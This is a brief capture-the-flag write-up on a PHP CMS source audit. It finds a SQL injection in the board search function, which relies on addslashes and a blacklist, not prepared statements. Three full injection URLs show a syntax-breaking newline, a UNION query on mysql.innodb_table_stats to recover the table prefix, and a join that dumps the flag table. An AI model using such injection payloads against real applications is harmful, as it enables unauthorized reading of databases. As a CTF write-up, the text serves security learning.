Rating: 3.5

This chanllage is a typical CMS source code audit. Accordind to source code, flag is in ``{table_prefix}flag.{blind_column}4``, but ``{table_prefix}`` and ``{blind_column}`` is unknown. This cms don't use pre-compiled technology, but use addslash and blacklist. After looking at source code, I found the ``action_search()`` in ``Board.class.php`` is weird, seems we can inject via ``search`` as below

```
http://13.125.3.183/index.php?act=board&mid=search&col=title%23&type=1&search=test%0a)%23
```

With this payload, ``\n`` will trigger a syntax error, then we try to use ``mysql`` db to get ``{table_prefix}``.

```
http://13.125.3.183/index.php?act=board&mid=search&col=title%23&type=1&search=test%0a)%3C0%20union%20select%201,(select%20table_name%20from%20mysql.innodb_table_stats%20limit%202,1),3,4,5%23
```

At last, we can use ``join`` to get flag.

```
http://13.125.3.183/index.php?act=board&mid=search&col=title%23&type=1&search=test%0A)%3C0%20union%20(select%201,t.*%20from%20mysql.user%20join%2041786c497656426a6149_flag%20t)%23
```